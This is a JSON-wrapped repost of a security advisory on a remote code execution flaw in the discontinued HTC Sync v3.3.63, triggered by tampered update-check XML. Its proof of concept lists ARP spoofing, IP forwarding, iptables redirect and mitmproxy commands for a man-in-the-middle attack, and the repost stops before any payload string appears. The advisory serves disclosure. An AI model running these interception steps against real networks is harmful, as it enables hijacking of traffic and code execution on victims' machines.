{"id":6801,"date":"2017-02-27T14:19:11","date_gmt":"2017-02-27T22:19:11","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/02\/27\/news-592\/"},"modified":"2017-02-27T14:19:11","modified_gmt":"2017-02-27T22:19:11","slug":"news-592","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/02\/27\/news-592\/","title":{"rendered":"SSD Advisory &#8211; HTC Sync Remote Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: Maor Schwartz | Date: Mon, 27 Feb 2017 10:19:14 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes a remote code execution (RCE) vulnerability found in HTC Sync v3.3.63.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> The vulnerability was not reported to the vendor because the product reached <a href=\"http:\/\/www.htc.com\/us\/software\/htc-sync\/\" target=\"_blank\">end of life<\/a> on 31 August 2016 and was replaced by HTC Sync Manager, which is not affected by this vulnerability.<\/p>\n<p><span id=\"more-3026\"><\/span><\/p>\n<p><strong>Vulnerability Details<\/strong><\/p>\n<p>The latest version of HTC Sync (v3.3.63) contains a remotely exploitable vulnerability. At startup, or when explicitly triggered by the user, HTC Sync checks for the latest version by sending an <em>HTTP<\/em> request to <em>htc.com<\/em> and then parsing the reply (XML format). 
<\/p>\n<p>In particular, the application first requests:<\/p>\n<div id=\"crayon-58b4a5de06298074639950\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">http:\/\/dl2.htc.com\/download\/pcs\/Release1\/HTCSync.xml<\/textarea><\/div>\n<\/div>\n<p>That document contains a link to the download <em>URI<\/em>, which is available in:<\/p>\n<div id=\"crayon-58b4a5de062a1026593233\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">http:\/\/dl2.htc.com\/download\/pcs\/Release1\/HTCSyncRelease.xml<\/textarea><\/div>\n<\/div>\n<p>By modifying, for example, the &#8220;<em>version<\/em>&#8221; field in the XML document, an attacker can inject arbitrary code that gets executed on the victim\u2019s machine.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>An attacker who can obtain a man-in-the-middle position, through either ARP spoofing or DNS poisoning, can intercept the traffic and supply an overly long XML parameter, which leads to remote code execution on the victim\u2019s machine. 
<\/p>\n<p>We used Kali Linux to set up the man-in-the-middle attack:<\/p>\n<ol>\n<li>Enable ARP spoofing<\/li>\n<div id=\"crayon-58b4a5de062a5067175836\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">arpspoof -i eth0 -t 192.168.8.90 192.168.8.8 (from victim to mitm)\narpspoof -i eth0 -t 192.168.8.90 192.168.8.1 (from router to victim)<\/textarea><\/div>\n<\/div>\n<li>Enable IP forwarding<\/li>\n<div id=\"crayon-58b4a5de062a7032129832\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">echo 1 &gt;&gt; \/proc\/sys\/net\/ipv4\/ip_forward<\/textarea><\/div>\n<\/div>\n<li>Add an iptables rule for the mitm proxy:<\/li>\n<div id=\"crayon-58b4a5de062a9148106541\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080<\/textarea><\/div>\n<\/div>\n<li>Start <em>mitmproxy<\/em><\/li>\n<div id=\"crayon-58b4a5de062ac219239172\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">mitmproxy -T --host<\/textarea><\/div>\n<\/div>\n<li>Intercept and modify traffic by hand<\/li>\n<\/ol>\n<p>The &#8220;<em>version<\/em>&#8221; string for popping up calc.exe is:<\/p>\n<\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3026\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Mon, 27 Feb 2017 10:19:14 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes a remote code execution (RCE) found in HTC Sync version v3.3.63. Credit An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program. 
Vendor response The vulnerability was not reported to the vendor because the product has reached end of life on 31 August 2016 &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3026\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory &#8211; HTC Sync Remote Code Execution<\/span> <span class=\"meta-nav\">&#8594;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10755],"class_list":["post-6801","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-commentary"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6801","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=6801"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6801\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=6801"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=6801"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=6801"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}